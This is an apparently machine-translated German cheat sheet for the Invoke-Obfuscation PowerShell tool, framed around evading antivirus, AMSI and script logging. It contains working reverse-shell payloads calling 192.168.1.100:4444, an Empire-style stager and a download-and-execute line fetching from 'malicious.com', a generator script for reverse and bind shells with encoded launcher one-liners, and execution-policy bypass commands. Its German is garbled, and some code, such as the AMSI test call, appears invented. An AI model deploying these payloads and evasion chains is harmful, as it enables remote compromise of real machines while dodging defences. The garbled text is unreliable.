Invoke-Obfuscation Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Invoke-Obfuscation ist eine Kraft Shell v2.0+ kompatible Leistung Shell Befehl und Skript obfuscator. Es wurde entwickelt, um rote Teamer und Penetrationstester bei der Umgehung von Antivirenprogrammen, Applikation Whitelisting und anderen defensiven Maßnahmen durch obfuscating PowerShell Skripte und Befehle zu unterstützen. Das Tool bietet mehrere obfuscation-Techniken einschließlich tokenbasierter Obfuskation, String obfuscation, Encoding und Kompression.

ZEIT Warning: Verwenden Sie nur Invoke-Obfuscation in Umgebungen, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben. Unberechtigte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen. Dieses Tool ist nur für legitime Sicherheitstests bestimmt.

Installation

Installation von PowerShell

```powershell

Install from PowerShell Gallery (recommended)

Install-Module -Name Invoke-Obfuscation -Force

Import the module

Import-Module Invoke-Obfuscation

Verify installation

Get-Command -Module Invoke-Obfuscation ```_

Manuelle Installation

```powershell

Download from GitHub

Invoke-WebRequest -Uri "https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip" -OutFile "Invoke-Obfuscation.zip"

Extract the archive

Expand-Archive -Path "Invoke-Obfuscation.zip" -DestinationPath "C:\Tools\"

Import the module

Import-Module "C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"

Or add to PowerShell profile for persistent loading

$ProfilePath = $PROFILE.AllUsersAllHosts if (!(Test-Path $ProfilePath)) \\{ New-Item -Path $ProfilePath -ItemType File -Force \\} Add-Content -Path $ProfilePath -Value "Import-Module C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1" ```_

Gierinstallation

```bash

Clone the repository

git clone https://github.com/danielbohannon/Invoke-Obfuscation.git cd Invoke-Obfuscation

Import in PowerShell

powershell -Command "Import-Module .\Invoke-Obfuscation.psd1" ```_

Kali Linux Installation

```bash

Install PowerShell on Kali Linux

sudo apt update sudo apt install -y powershell

Start PowerShell

pwsh

Install Invoke-Obfuscation

Install-Module -Name Invoke-Obfuscation -Force Import-Module Invoke-Obfuscation ```_

Basisnutzung

Interaktiver Modus

```powershell

Start interactive obfuscation session

Invoke-Obfuscation

Set script to obfuscate

SET SCRIPTPATH C:\Scripts\payload.ps1

Set script block to obfuscate

SET SCRIPTBLOCK \\{Get-Process; Get-Service\\}

Show current settings

SHOW OPTIONS

Show available obfuscation types

SHOW

Get help

HELP ```_

Befehlszeilenmodus

```powershell

Obfuscate a script file

Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet

Obfuscate a script block

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "STRING\1" -Quiet

Obfuscate with multiple techniques

Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1,ENCODING\1" -Quiet

Save obfuscated output to file

Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet|Out-File "C:\Scripts\obfuscated.ps1" ```_

Techniken der Verschmelzung

Token Obfuscation

```powershell

Obfuscate all tokens with random case

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\ALL\1" -Quiet

Obfuscate specific token types

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\COMMAND\1" -Quiet Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\COMMANDARGUMENT\1" -Quiet Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\MEMBER\1" -Quiet Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\VARIABLE\1" -Quiet

Advanced token obfuscation

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\ALL\2" -Quiet Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\ALL\3" -Quiet ```_

String Obfuscation

```powershell

Concatenate strings

Invoke-Obfuscation -ScriptBlock \\{'Hello World'\\} -Command "STRING\1" -Quiet

Reorder strings

Invoke-Obfuscation -ScriptBlock \\{'Hello World'\\} -Command "STRING\2" -Quiet

Reverse strings

Invoke-Obfuscation -ScriptBlock \\{'Hello World'\\} -Command "STRING\3" -Quiet

Advanced string obfuscation

$script = \\{ $message = "This is a test message" Write-Host $message \\} Invoke-Obfuscation -ScriptBlock $script -Command "STRING\1" -Quiet ```_

Kodierung der Obfukation

```powershell

ASCII encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\1" -Quiet

Hex encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\2" -Quiet

Octal encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\3" -Quiet

Binary encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\4" -Quiet

SecureString encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\5" -Quiet

BXOR encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\6" -Quiet

Special character encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\7" -Quiet

Whitespace encoding

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "ENCODING\8" -Quiet ```_

Compression Obfuskation

```powershell

GZip compression

Invoke-Obfuscation -ScriptBlock \\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\} -Command "COMPRESS\1" -Quiet

Deflate compression

Invoke-Obfuscation -ScriptBlock \\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\} -Command "COMPRESS\2" -Quiet ```_

Starter Obfuskation

```powershell

PowerShell launcher

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\PS\1" -Quiet

CMD launcher

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\CMD\1" -Quiet

WMIC launcher

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\WMIC\1" -Quiet

Rundll32 launcher

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\RUNDLL32\1" -Quiet

VAR+ launcher (advanced)

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\VAR+\1" -Quiet

STDIN+ launcher

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\STDIN+\1" -Quiet

CLIP+ launcher

Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "LAUNCHER\CLIP+\1" -Quiet ```_

Fortgeschrittene Obfukation

Multi-Layer Obfuskation

```powershell

Apply multiple obfuscation techniques

$script = \\{ $processes = Get-Process $services = Get-Service Write-Host "Found $($processes.Count) processes and $($services.Count) services" \\}

Layer 1: Token obfuscation

$obfuscated1 = Invoke-Obfuscation -ScriptBlock $script -Command "TOKEN\ALL\1" -Quiet

Layer 2: String obfuscation

$obfuscated2 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated1)) -Command "STRING\1" -Quiet

Layer 3: Encoding

$obfuscated3 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated2)) -Command "ENCODING\1" -Quiet

Layer 4: Compression

$final = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated3)) -Command "COMPRESS\1" -Quiet

Write-Host $final ```_

Benutzerdefinierte Fettungsketten

```powershell

Define obfuscation chain

$obfuscationChain = @( "TOKEN\ALL\1", "STRING\2", "ENCODING\3", "LAUNCHER\PS\1" )

Apply chain to script

$script = \\{ Invoke-WebRequest -Uri "http://malicious.com/payload.ps1"|Invoke-Expression \\}

$result = $script foreach ($command in $obfuscationChain) \\{ $result = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($result)) -Command $command -Quiet \\}

Write-Host $result ```_

Payload-Specific Obfuscation

```powershell

Obfuscate Meterpreter payload

$meterpreterPayload = \\{ $client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%\\{0\\} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) \\{ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $sendback = (iex $data 2>&1|Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() \\} $client.Close() \\}

$obfuscatedMeterpreter = Invoke-Obfuscation -ScriptBlock $meterpreterPayload -Command "TOKEN\ALL\1,STRING\1,ENCODING\1" -Quiet ```_

Reich / Bund Payload Obfuskation

```powershell

Obfuscate Empire stager

$empireStager = \\{ $wc=New-Object System.Net.WebClient $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' $wc.Headers.Add('User-Agent',$u) $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $Script:Proxy = $wc.Proxy $K=[System.Text.Encoding]::ASCII.GetBytes('staging_key_here') | $R=\\{$D,$K=$Args;$S=0..255;0..255 | %\\{$J=($J+$S[$]+$K[$%$K.Count])%256;$S[$],$S[$J]=$S[$J],$S[$]\\};$D | %\\{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]\\}\\} | $ser='http://192.168.1.100:80' $t='/admin/get.php' $wc.Headers.Add("Cookie","session=value") $data=$wc.DownloadData($ser+$t) $iv=$data[0..3];$data=$data[4..$data.length] -joinChar[]|IEX \\}

$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,LAUNCHER\PS\1" -Quiet ```_

Automatisierungsskripte

Batch Obfuscation Script

```powershell

Batch obfuscation script

param( [Parameter(Mandatory=$true)] [string]$InputDirectory,

[Parameter(Mandatory=$true)]
[string]$OutputDirectory,

[string[]]$ObfuscationCommands = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")

)

Create output directory if it doesn't exist

if (!(Test-Path $OutputDirectory)) \\{ New-Item -ItemType Directory -Path $OutputDirectory -Force \\}

Get all PowerShell files

$psFiles = Get-ChildItem -Path $InputDirectory -Filter "*.ps1" -Recurse

foreach ($file in $psFiles) \\{ Write-Host "[+] Processing: $($file.Name)"

try \\\\{
    # Read the script content
    $scriptContent = Get-Content -Path $file.FullName -Raw
    $scriptBlock = [ScriptBlock]::Create($scriptContent)

    # Apply obfuscation
    $obfuscated = $scriptContent
    foreach ($command in $ObfuscationCommands) \\\\{
        Write-Host "  Applying: $command"
        $obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated)) -Command $command -Quiet
    \\\\}

    # Save obfuscated script
    $outputPath = Join-Path $OutputDirectory "$($file.BaseName)_obfuscated.ps1"
    $obfuscated|Out-File -FilePath $outputPath -Encoding UTF8

    Write-Host "  ✓ Saved: $outputPath"

\\\\} catch \\\\{
    Write-Host "  ✗ Error: $($_.Exception.Message)" -ForegroundColor Red
\\\\}

\\}

Write-Host "[+] Batch obfuscation completed" ```_

Payload Generator Script

```powershell

Advanced payload generator with obfuscation

param( [Parameter(Mandatory=$true)] [string]$LHOST,

[Parameter(Mandatory=$true)]
[int]$LPORT,

[string]$PayloadType = "reverse_tcp",
[string]$OutputPath = ".\obfuscated_payload.ps1",
[string[]]$ObfuscationLevels = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")

)

Define payload templates

$payloadTemplates = @\\{ "reverse_tcp" = @" $client = New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT)$stream = $client.GetStream() [byte[]]$bytes = 0..65535|%\\{0\\} while(($i =$stream.Read($bytes, 0,$bytes.Length)) -ne 0) \\{ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)$sendback = (iex $data 2>&1|Out-String)$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)$stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() \\}$client.Close() "@

"reverse_http" = @"

$wc = New-Object System.Net.WebClient$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36') while($true) \\{ try \\{$command = $wc.DownloadString('http://$LHOST:$LPORT/command') if ($command) \\{$result = iex $command 2>&1|Out-String$wc.UploadString('http://$LHOST:$LPORT/result',$result) \\} Start-Sleep -Seconds 5 \\} catch \\{ Start-Sleep -Seconds 10 \\} \\} "@

"bind_tcp" = @"

$listener = [System.Net.Sockets.TcpListener]$LPORT$listener.Start() $client =$listener.AcceptTcpClient() $stream =$client.GetStream() [byte[]]$bytes = 0..65535|%\\{0\\} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) \\{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i) $sendback = (iex$data 2>&1|Out-String) $sendback2 =$sendback + 'PS ' + (pwd).Path + '> ' $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length)$stream.Flush() \\} $client.Close()$listener.Stop() "@ \\}

Generate base payload

if ($payloadTemplates.ContainsKey($PayloadType)) \\{ $basePayload = $payloadTemplates[$PayloadType] Write-Host "[+] Generated $PayloadType payload for $LHOST`:$LPORT" \} else \{ Write-Host "[-] Unknown payload type: $PayloadType" -ForegroundColor Red return \}

Apply obfuscation

$obfuscatedPayload = $basePayload foreach ($level in $ObfuscationLevels) \{ Write-Host "[+] Applying obfuscation: $level" $obfuscatedPayload = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscatedPayload)) -Command $level -Quiet \}

Save to file

$obfuscatedPayload|Out-File -FilePath $OutputPath -Encoding UTF8 Write-Host "[+] Obfuscated payload saved to: $OutputPath"

Generate launcher commands

Write-Host "n[+] Launcher commands:" Write-Host "PowerShell: powershell.exe -ExecutionPolicy Bypass -File"$OutputPath`"" Write-Host "Encoded: powershell.exe -EncodedCommand $([Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($obfuscatedPayload)))"

Generate one-liner

$oneLiner = $obfuscatedPayload -replace "rn", "; " -replace "n", "; " Write-Host "n[+] One-liner:" Write-Host "powershell.exe -Command "$oneLiner"" ```_

Evasion Testing Script

```powershell

Test obfuscated payloads against AMSI and other defenses

param( [Parameter(Mandatory=$true)] [string]$PayloadPath,

[switch]$TestAMSI,
[switch]$TestExecutionPolicy,
[switch]$TestScriptBlockLogging,
[switch]$All

)

if ($All) \\{ $TestAMSI = $true $TestExecutionPolicy = $true $TestScriptBlockLogging = $true \\}

Write-Host "[+] Testing payload: $PayloadPath"

Read payload

$payload = Get-Content -Path $PayloadPath -Raw

Test AMSI

if ($TestAMSI) \\{ Write-Host "`n[+] Testing AMSI detection..."

try \\{
    # Check if AMSI detects the payload
    $amsiContext = [System.IntPtr]::Zero
    $amsiSession = [System.IntPtr]::Zero

    # This is a simplified test - in reality, AMSI testing is more complex
    $result = [System.Management.Automation.AmsiUtils]::ScanContent($payload, "test")

    if ($result -eq "Clean") \\{
        Write-Host "  ✓ AMSI: Clean" -ForegroundColor Green
    \\} else \\{
        Write-Host "  ✗ AMSI: Detected" -ForegroundColor Red
    \\}
\\} catch \\{
    Write-Host "  ? AMSI: Unable to test" -ForegroundColor Yellow
\\}

\}

Test Execution Policy

if ($TestExecutionPolicy) \{ Write-Host "`n[+] Testing Execution Policy bypass..."

$currentPolicy = Get-ExecutionPolicy
Write-Host "  Current policy: $currentPolicy"

if ($currentPolicy -eq "Restricted" -or $currentPolicy -eq "AllSigned") \\\\{
    Write-Host "  ⚠ Restrictive policy detected" -ForegroundColor Yellow
    Write-Host "  Bypass methods:"
    Write-Host "    powershell.exe -ExecutionPolicy Bypass -File `"$PayloadPath`""
    Write-Host "    powershell.exe -Command `"Set-ExecutionPolicy Bypass -Scope Process; & '$PayloadPath'`""
\\\\} else \\\\{
    Write-Host "  ✓ Policy allows execution" -ForegroundColor Green
\\\\}

\\}

Test Script Block Logging

if ($TestScriptBlockLogging) \\{ Write-Host "`n[+] Testing Script Block Logging evasion..."

$logPolicy = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -ErrorAction SilentlyContinue

if ($logPolicy -and $logPolicy.EnableScriptBlockLogging -eq 1) \\{
    Write-Host "  ⚠ Script Block Logging is enabled" -ForegroundColor Yellow
    Write-Host "  Consider additional obfuscation or AMSI bypass"
\\} else \\{
    Write-Host "  ✓ Script Block Logging not detected" -ForegroundColor Green
\\}

\}

Test payload execution (dry run)

Write-Host "`n[+] Testing payload syntax..." try \\{ $scriptBlock = [ScriptBlock]::Create($payload) Write-Host " ✓ Syntax is valid" -ForegroundColor Green \\} catch \\{ Write-Host " ✗ Syntax error: $($_.Exception.Message)" -ForegroundColor Red \\}

Write-Host "`n[+] Testing completed" ```_

Integration mit Angriffsrahmen

Metasploit Integration

```powershell

Generate obfuscated Metasploit payload

$msfPayload = @" $client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444)$stream = $client.GetStream() [byte[]]$bytes = 0..65535|%\{0\} while(($i =$stream.Read($bytes, 0,$bytes.Length)) -ne 0) \{ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)$sendback = (iex $data 2>&1|Out-String)$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)$stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() \\\\}$client.Close() "@

Obfuscate for Metasploit

$obfuscatedMSF = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($msfPayload)) -Command "TOKEN\ALL\1,STRING\1,ENCODING\1,LAUNCHER\PS\1" -Quiet

Save for use with Metasploit

$obfuscatedMSF|Out-File -FilePath "msf_payload_obfuscated.ps1" ```_

Integrieren der Welt

```powershell

Obfuscate Empire stager

$empireStager = \{ # Empire stager code here $wc=New-Object System.Net.WebClient $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' $wc.Headers.Add('User-Agent',$u) # ... rest of Empire stager \}

Apply heavy obfuscation for Empire

$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,COMPRESS\1,LAUNCHER\VAR+\1" -Quiet ```_

Covens Integration

```powershell

Obfuscate Covenant Grunt

$covenantGrunt = \{ # Covenant Grunt code here [System.Net.ServicePointManager]::ServerCertificateValidationCallback = \{$true\} $wc = New-Object System.Net.WebClient # ... rest of Covenant Grunt \}

Apply obfuscation for Covenant

$obfuscatedCovenant = Invoke-Obfuscation -ScriptBlock $covenantGrunt -Command "TOKEN\ALL\1,STRING\1,ENCODING\3,LAUNCHER\RUNDLL32\1" -Quiet ```_

Fehlerbehebung

Gemeinsame Themen

Module Import Probleme

```powershell

Fix module import issues

Import-Module Invoke-Obfuscation -Force

Check module location

Get-Module -ListAvailable|Where-Object \{$_.Name -like "Obfuscation"\}

Manual import

Import-Module "C:\Path\To\Invoke-Obfuscation.psd1"

Check PowerShell execution policy

Get-ExecutionPolicy Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser ```_

Fehler bei der Berechnung

```powershell

Debug obfuscation issues

$ErrorActionPreference = "Stop" try \{ $result = Invoke-Obfuscation -ScriptBlock \{Get-Process\} -Command "TOKEN\ALL\1" -Quiet \} catch \{ Write-Host "Error: $($.Exception.Message)" Write-Host "Stack Trace: $($.ScriptStackTrace)" \}

Test with simpler commands

Invoke-Obfuscation -ScriptBlock \{Write-Host "Test"\} -Command "STRING\1" -Quiet

Check PowerShell version compatibility

$PSVersionTable.PSVersion ```_

Leistungsfragen

```powershell

Optimize for large scripts

$script = Get-Content -Path "large_script.ps1" -Raw

Use simpler obfuscation for large scripts

$obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($script)) -Command "TOKEN\COMMAND\1" -Quiet

Process in chunks for very large scripts

$lines = Get-Content -Path "large_script.ps1" $chunkSize = 100 for ($i = 0; $i -lt $lines.Count; $i += $chunkSize) \{ $chunk = $lines[$i..($i + $chunkSize - 1)] -join "`n" # Process chunk \\} ```_

Debugging und Testing

```powershell

Test obfuscated script execution

$obfuscated = Invoke-Obfuscation -ScriptBlock \\{Get-Date\\} -Command "TOKEN\ALL\1" -Quiet

Execute obfuscated script

Invoke-Expression $obfuscated

Compare original vs obfuscated output

$original = Get-Date $obfuscatedResult = Invoke-Expression $obfuscated Compare-Object $original $obfuscatedResult

Validate script syntax

$scriptBlock = [ScriptBlock]::Create($obfuscated) $scriptBlock.CheckRestrictedLanguage($false) ```_

Ressourcen

• Offizielles Invoke-Obfuscation Repository
• (LINK7)
• AMSI Bypass Techniques
• PowerShell Security Best Practices
• [Script Block Logging](_LINK_7__ -%20(LINK_7)
• Red Team PowerShell Techniques

--

*Dieses Betrugsblatt bietet eine umfassende Referenz für die Verwendung von Invoke-Obfuscation für PowerShell Skript und Befehlsobfuskation. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *